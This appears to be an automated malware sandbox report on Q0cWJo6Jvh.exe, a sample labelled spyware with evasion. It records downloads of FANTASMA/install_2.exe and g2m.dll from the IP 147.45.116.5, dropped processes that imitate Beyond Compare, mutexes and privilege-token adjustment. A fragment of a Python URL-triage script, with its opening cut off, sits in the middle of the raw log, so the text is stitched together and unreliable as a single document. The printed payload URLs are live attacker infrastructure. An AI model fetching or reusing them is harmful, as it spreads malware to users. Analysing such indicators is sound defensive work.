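Source: Q0cWJo6Jvh.exe, 00000000.00000002.3338900809.000000FD9BDF3000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/install_2.exe
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.php
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.php?user-PC
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.php_j
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/download.php
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/download.phpS
Source: ybtrrus.exe, 00000005.00000002.3340950977.0000000001063000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgradeF
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002BD3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgrade
""".splitlines()

LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>[^\s,]+).*?String found in binary or memory:\s*(?P<url>https?://\S+)")
MAX_OVERRUN = 4   # assumption: at most this many trailing bytes are blamed on a missing terminator


def canonical(url: str) -> str:
    """Lower-case the host, drop a default port and trailing dot, give bare hosts a '/' path."""
    p = urlsplit(url)
    host = (p.hostname or "").rstrip(".")
    try:
        port = p.port
    except ValueError:          # garbage where the port number should be
        port = None
    default = {"http": 80, "https": 443}.get(p.scheme)
    netloc = host if port in (None, default) else f"{host}:{port}"
    return urlunsplit((p.scheme, netloc, p.path or "/", p.query, ""))


def extract(lines):
    """Map each canonical URL to the set of processes whose memory contained it."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            seen[canonical(m["url"])].add(m["proc"])
    return seen


def collapse(urls):
    """Map every URL to a representative: itself, or the observed shorter URL that it only
    extends by a few non-separator bytes (carving overrun such as '0101.zipoE')."""
    rep = {}
    for u in sorted(set(urls), key=len):        # shorter candidates are decided first
        rep[u] = u
        for k in list(rep):
            tail = u[len(k):]
            if (k != u and u.startswith(k) and len(tail) <= MAX_OVERRUN
                    and not any(c in tail for c in "/?")):
                rep[u] = rep[k]                 # follow chains (exe -> exe9 -> ...)
                break
    return rep


def _is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage(lines):
    """Cleaned URLs grouped by host, each with every process that referenced any variant."""
    seen = extract(lines)
    rep = collapse(seen)
    merged = defaultdict(set)
    for raw, procs in seen.items():
        merged[rep[raw]] |= procs
    by_host = defaultdict(list)
    for url, procs in merged.items():
        by_host[urlsplit(url).hostname].append((url, sorted(procs)))
    return {host: {"ip_literal": _is_ip(host), "urls": sorted(entries)}
            for host, entries in by_host.items()}


if __name__ == "__main__":
    for host, info in triage(REPORT_LINES).items():
        tag = "IP-literal host, direct download infrastructure" if info["ip_literal"] else "named host"
        print(f"{host} ({tag})")
        for url, procs in info["urls"]:
            print(f"  {url}  <- {', '.join(procs)}")
```

Keep the raw set alongside the collapsed one when you file indicators: the heuristic would also fold a genuine "/upgrades" onto an observed "/upgrade", which is acceptable for triage but not for a blocklist.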
Source: C:\temp333\install_2.dll Memory allocated: 76AB0000 page execute and read and write Jump to behavior
Source: C:\temp333\install_2.dll Code function: 2_2_6D372910 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError, 2_2_6D372910
Source: C:\temp333\install_2.dll Code function: 2_2_6D334430 NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError, 2_2_6D334430
Source: C:\temp333\install_2.dll Code function: 2_2_6D368701 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 2_2_6D368701
Source: C:\temp333\install_2.dll Code function: 2_2_6D3727F0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 2_2_6D3727F0
Source: C:\temp333\install_2.dll Code function: 2_2_6D335E50 NtCancelIoFileEx,RtlNtStatusToDosError, 2_2_6D335E50
Source: C:\temp333\install_2.dll Code function: 2_2_6D337920 NtCancelIoFileEx,RtlNtStatusToDosError, 2_2_6D337920
Source: C:\temp333\install_2.dll Code function: 2_2_6D333B50 NtCancelIoFileEx,RtlNtStatusToDosError, 2_2_6D333B50
Source: C:\temp333\install_2.dll Code function: 2_2_6D3372C0 NtCancelIoFileEx,RtlNtStatusToDosError, 2_2_6D3372C0
Source: C:\temp333\install_2.dll Code function: 2_2_6D334430: NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError, 2_2_6D334430
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779869A70 0_2_00007FF779869A70
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986F9B0 0_2_00007FF77986F9B0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77984F9C0 0_2_00007FF77984F9C0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987597D 0_2_00007FF77987597D
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779831CC0 0_2_00007FF779831CC0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779843DE0 0_2_00007FF779843DE0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987E0A0 0_2_00007FF77987E0A0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77983A080 0_2_00007FF77983A080
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779861F2E 0_2_00007FF779861F2E
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77984FF50 0_2_00007FF77984FF50
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779861F78 0_2_00007FF779861F78
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77985D280 0_2_00007FF77985D280
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77985B1F0 0_2_00007FF77985B1F0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798793F6 0_2_00007FF7798793F6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77988F410 0_2_00007FF77988F410
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986D356 0_2_00007FF77986D356
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779837360 0_2_00007FF779837360
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986B6D4 0_2_00007FF77986B6D4
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798716E0 0_2_00007FF7798716E0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779857700 0_2_00007FF779857700
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987B700 0_2_00007FF77987B700
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987D660 0_2_00007FF77987D660
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779859850 0_2_00007FF779859850
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798317C0 0_2_00007FF7798317C0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779887760 0_2_00007FF779887760
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779872A70 0_2_00007FF779872A70
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987ACC0 0_2_00007FF77987ACC0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779860D0E 0_2_00007FF779860D0E
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779870D00 0_2_00007FF779870D00
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779828C80 0_2_00007FF779828C80
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987CBC0 0_2_00007FF77987CBC0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77983AB50 0_2_00007FF77983AB50
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779874B50 0_2_00007FF779874B50
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779860D58 0_2_00007FF779860D58
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986F020 0_2_00007FF77986F020
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779835070 0_2_00007FF779835070
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798C4F30 0_2_00007FF7798C4F30
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987A2A0 0_2_00007FF77987A2A0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779840250 0_2_00007FF779840250
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779872272 0_2_00007FF779872272
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77985C260 0_2_00007FF77985C260
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986E1D3 0_2_00007FF77986E1D3
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798281F0 0_2_00007FF7798281F0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77987C120 0_2_00007FF77987C120
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779878515 0_2_00007FF779878515
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986C504 0_2_00007FF77986C504
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779842490 0_2_00007FF779842490
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779870370 0_2_00007FF779870370
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798566E0 0_2_00007FF7798566E0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77988C5B0 0_2_00007FF77988C5B0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77988A5D0 0_2_00007FF77988A5D0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF7798508B0 0_2_00007FF7798508B0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77982E8F0 0_2_00007FF77982E8F0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF779838910 0_2_00007FF779838910
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 0_2_00007FF77986A884 0_2_00007FF77986A884
Source: C:\temp333\install_2.dll Code function: 2_2_6D204570 2_2_6D204570
Source: C:\temp333\install_2.dll Code function: 2_2_6D1D27E0 2_2_6D1D27E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D373DBB 2_2_6D373DBB
Source: C:\temp333\install_2.dll Code function: 2_2_6D1D79E0 2_2_6D1D79E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E3B80 2_2_6D1E3B80
Source: C:\temp333\install_2.dll Code function: 2_2_6D1D9600 2_2_6D1D9600
Source: C:\temp333\install_2.dll Code function: 2_2_6D1D33D2 2_2_6D1D33D2
Source: C:\temp333\install_2.dll Code function: 2_2_6D310D10 2_2_6D310D10
Source: C:\temp333\install_2.dll Code function: 2_2_6D36CD50 2_2_6D36CD50
Source: C:\temp333\install_2.dll Code function: 2_2_6D358DF0 2_2_6D358DF0
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E8CC0 2_2_6D1E8CC0
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E8F10 2_2_6D1E8F10
Source: C:\temp333\install_2.dll Code function: 2_2_6D384E00 2_2_6D384E00
Source: C:\temp333\install_2.dll Code function: 2_2_6D38CEF0 2_2_6D38CEF0
Source: C:\temp333\install_2.dll Code function: 2_2_6D38C910 2_2_6D38C910
Source: C:\temp333\install_2.dll Code function: 2_2_6D1DC980 2_2_6D1DC980
Source: C:\temp333\install_2.dll Code function: 2_2_6D1EE800 2_2_6D1EE800
Source: C:\temp333\install_2.dll Code function: 2_2_6D358880 2_2_6D358880
Source: C:\temp333\install_2.dll Code function: 2_2_6D3708F0 2_2_6D3708F0
Source: C:\temp333\install_2.dll Code function: 2_2_6D358B70 2_2_6D358B70
Source: C:\temp333\install_2.dll Code function: 2_2_6D1F0B40 2_2_6D1F0B40
Source: C:\temp333\install_2.dll Code function: 2_2_6D2E0A30 2_2_6D2E0A30
Source: C:\temp333\install_2.dll Code function: 2_2_6D1DEA50 2_2_6D1DEA50
Source: C:\temp333\install_2.dll Code function: 2_2_6D220500 2_2_6D220500
Source: C:\temp333\install_2.dll Code function: 2_2_6D36A511 2_2_6D36A511
Source: C:\temp333\install_2.dll Code function: 2_2_6D36E51E 2_2_6D36E51E
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E8550 2_2_6D1E8550
Source: C:\temp333\install_2.dll Code function: 2_2_6D2B65A0 2_2_6D2B65A0
Source: C:\temp333\install_2.dll Code function: 2_2_6D39A590 2_2_6D39A590
Source: C:\temp333\install_2.dll Code function: 2_2_6D398470 2_2_6D398470
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E8710 2_2_6D1E8710
Source: C:\temp333\install_2.dll Code function: 2_2_6D3867E0 2_2_6D3867E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D3907C0 2_2_6D3907C0
Source: C:\temp333\install_2.dll Code function: 2_2_6D34C610 2_2_6D34C610
Source: C:\temp333\install_2.dll Code function: 2_2_6D1DC630 2_2_6D1DC630
Source: C:\temp333\install_2.dll Code function: 2_2_6D304600 2_2_6D304600
Source: C:\temp333\install_2.dll Code function: 2_2_6D1F06C0 2_2_6D1F06C0
Source: C:\temp333\install_2.dll Code function: 2_2_6D34C170 2_2_6D34C170
Source: C:\temp333\install_2.dll Code function: 2_2_6D220140 2_2_6D220140
Source: C:\temp333\install_2.dll Code function: 2_2_6D2881A0 2_2_6D2881A0
Source: C:\temp333\install_2.dll Code function: 2_2_6D31C190 2_2_6D31C190
Source: C:\temp333\install_2.dll Code function: 2_2_6D34A180 2_2_6D34A180
Source: C:\temp333\install_2.dll Code function: 2_2_6D39C0E0 2_2_6D39C0E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D2C40F0 2_2_6D2C40F0
Source: C:\temp333\install_2.dll Code function: 2_2_6D38A3A0 2_2_6D38A3A0
Source: C:\temp333\install_2.dll Code function: 2_2_6D358220 2_2_6D358220
Source: C:\temp333\install_2.dll Code function: 2_2_6D322210 2_2_6D322210
Source: C:\temp333\install_2.dll Code function: 2_2_6D25A216 2_2_6D25A216
Source: C:\temp333\install_2.dll Code function: 2_2_6D390240 2_2_6D390240
Source: C:\temp333\install_2.dll Code function: 2_2_6D1F02E0 2_2_6D1F02E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D2C1D60 2_2_6D2C1D60
Source: C:\temp333\install_2.dll Code function: 2_2_6D327DB0 2_2_6D327DB0
Source: C:\temp333\install_2.dll Code function: 2_2_6D287C60 2_2_6D287C60
Source: C:\temp333\install_2.dll Code function: 2_2_6D37BC40 2_2_6D37BC40
Source: C:\temp333\install_2.dll Code function: 2_2_6D329CB0 2_2_6D329CB0
Source: C:\temp333\install_2.dll Code function: 2_2_6D387C91 2_2_6D387C91
Source: C:\temp333\install_2.dll Code function: 2_2_6D287F00 2_2_6D287F00
Source: C:\temp333\install_2.dll Code function: 2_2_6D1F7F40 2_2_6D1F7F40
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E9F80 2_2_6D1E9F80
Source: C:\temp333\install_2.dll Code function: 2_2_6D395FC0 2_2_6D395FC0
Source: C:\temp333\install_2.dll Code function: 2_2_6D21FE20 2_2_6D21FE20
Source: C:\temp333\install_2.dll Code function: 2_2_6D34BE00 2_2_6D34BE00
Source: C:\temp333\install_2.dll Code function: 2_2_6D397E00 2_2_6D397E00
Source: C:\temp333\install_2.dll Code function: 2_2_6D323E60 2_2_6D323E60
Source: C:\temp333\install_2.dll Code function: 2_2_6D1EB910 2_2_6D1EB910
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E7920 2_2_6D1E7920
Source: C:\temp333\install_2.dll Code function: 2_2_6D357880 2_2_6D357880
Source: C:\temp333\install_2.dll Code function: 2_2_6D3978F0 2_2_6D3978F0
Source: C:\temp333\install_2.dll Code function: 2_2_6D3278D0 2_2_6D3278D0
Source: C:\temp333\install_2.dll Code function: 2_2_6D27DB00 2_2_6D27DB00
Source: C:\temp333\install_2.dll Code function: 2_2_6D38DB17 2_2_6D38DB17
Source: C:\temp333\install_2.dll Code function: 2_2_6D327B50 2_2_6D327B50
Source: C:\temp333\install_2.dll Code function: 2_2_6D395B9C 2_2_6D395B9C
Source: C:\temp333\install_2.dll Code function: 2_2_6D379A30 2_2_6D379A30
Source: C:\temp333\install_2.dll Code function: 2_2_6D2D9AD0 2_2_6D2D9AD0
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E9560 2_2_6D1E9560
Source: C:\temp333\install_2.dll Code function: 2_2_6D3455E0 2_2_6D3455E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D349480 2_2_6D349480
Source: C:\temp333\install_2.dll Code function: 2_2_6D359480 2_2_6D359480
Source: C:\temp333\install_2.dll Code function: 2_2_6D37B7A0 2_2_6D37B7A0
Source: C:\temp333\install_2.dll Code function: 2_2_6D3997F0 2_2_6D3997F0
Source: C:\temp333\install_2.dll Code function: 2_2_6D359670 2_2_6D359670
Source: C:\temp333\install_2.dll Code function: 2_2_6D1DD180 2_2_6D1DD180
Source: C:\temp333\install_2.dll Code function: 2_2_6D3591D0 2_2_6D3591D0
Source: C:\temp333\install_2.dll Code function: 2_2_6D345080 2_2_6D345080
Source: C:\temp333\install_2.dll Code function: 2_2_6D2C10C0 2_2_6D2C10C0
Source: C:\temp333\install_2.dll Code function: 2_2_6D387370 2_2_6D387370
Source: C:\temp333\install_2.dll Code function: 2_2_6D399250 2_2_6D399250
Source: C:\temp333\install_2.dll Code function: 2_2_6D2CD29F 2_2_6D2CD29F
Source: C:\temp333\install_2.dll Code function: 2_2_6D38F2F0 2_2_6D38F2F0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAAF480 5_2_6CAAF480
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB04C0 5_2_6CAB04C0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA5400 5_2_6CAA5400
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB8D30 5_2_6CAB8D30
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA9650 5_2_6CAA9650
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA4FF0 5_2_6CAA4FF0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB6750 5_2_6CAB6750
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB78E0 5_2_6CAB78E0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB98E0 5_2_6CAB98E0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAAE87E 5_2_6CAAE87E
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CABD85C 5_2_6CABD85C
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA5850 5_2_6CAA5850
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA11E0 5_2_6CAA11E0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB8A20 5_2_6CAB8A20
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB0200 5_2_6CAB0200
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB0BA0 5_2_6CAB0BA0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB03A4 5_2_6CAB03A4
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA4BB0 5_2_6CAA4BB0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB0380 5_2_6CAB0380
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB83E0 5_2_6CAB83E0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB43C0 5_2_6CAB43C0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA4B20 5_2_6CAA4B20
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798C72B0 appears 37 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798DD4D0 appears 99 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798D8740 appears 158 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798CA700 appears 93 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF779830CD0 appears 135 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798DCA20 appears 114 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798DC6E0 appears 33 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798C5FC0 appears 143 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798DD3E0 appears 100 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798DC840 appears 43 times
Source: C:\temp333\install_2.dll Code function: String function: 6D389ED0 appears 31 times
Source: C:\temp333\install_2.dll Code function: String function: 6D38B7E0 appears 51 times
Source: C:\temp333\install_2.dll Code function: String function: 6D366230 appears 31 times
Source: C:\temp333\install_2.dll Code function: String function: 6D39CB80 appears 167 times
Source: C:\temp333\install_2.dll Code function: String function: 6D39C830 appears 223 times
Source: C:\temp333\install_2.dll Code function: String function: 6D39C940 appears 159 times
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: String function: 6CABDE20 appears 37 times
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 556
Source: Q0cWJo6Jvh.exe Static PE information: Number of sections : 19 > 10
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2177810567.00000279C7398000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameG2M.exe8 vs Q0cWJo6Jvh.exe
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2724204838.00000279C739B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameG2M.exe8 vs Q0cWJo6Jvh.exe
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2177915595.00000279C7394000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameG2M.exe8 vs Q0cWJo6Jvh.exe
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2178029144.00000279C7395000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameG2M.exe8 vs Q0cWJo6Jvh.exe
Source: ybtrrus.exe, 00000005.00000002.3340950977.000000000100E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NumberCaseSig Value="False"/>*.frm;*.vb;*.vbp;.vbs"/>
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002B49000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: *.bas;*.cls;*.ctl;*.frm;*.vb;*.vbp;*.vbs
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: <Mask Value="*.bas;*.cls;*.ctl;*.frm;*.vb;*.vbp;*.vbs"/>
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002B49000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: (*.bas;*.cls;*.ctl;*.frm;*.vb;*.vbp;*.vbs@
Source: classification engine Classification label: mal80.spyw.evad.winEXE@25/11@3/4
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA8830 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, 5_2_6CAA8830
Source: C:\5p9SnCM5jV\ybtrrus.exe File created: C:\Users\user\AppData\Roaming\Scooter Software Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: NULL
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_6916
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1b00$432c4c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3472:120:WilError_03
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1734$432c4c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_1764
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$6e4
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1b04
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1764
Source: C:\5p9SnCM5jV\ybtrrus.exe File created: C:\Users\user\AppData\Local\Temp\ybtrrus.madExcept
Source: Yara match File source: 5.0.ybtrrus.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Q0cWJo6Jvh.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\5p9SnCM5jV\ybtrrus.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\5p9SnCM5jV\ybtrrus.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Q0cWJo6Jvh.exe String found in binary or memory: FANTASMA/install_2.exe
Source: Q0cWJo6Jvh.exe String found in binary or memory: http://147.45.116.5/FANTASMA/install_2.exe
Source: Q0cWJo6Jvh.exe String found in binary or memory: GEThttp://147.45.116.5/FANTASMA/g2m.dllDownloadBinary/1.0147.45.116.5FANTASMA/g2m.dllhttp://147.45.116.5/FANTASMA/install_2.exeFANTASMA/install_2.exeFalha ao iniciar o processo. C
Source: unknown Process created: C:\Users\user\Desktop\Q0cWJo6Jvh.exe "C:\Users\user\Desktop\Q0cWJo6Jvh.exe"
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Process created: C:\temp333\install_2.dll "C:\temp333\install_2.dll"
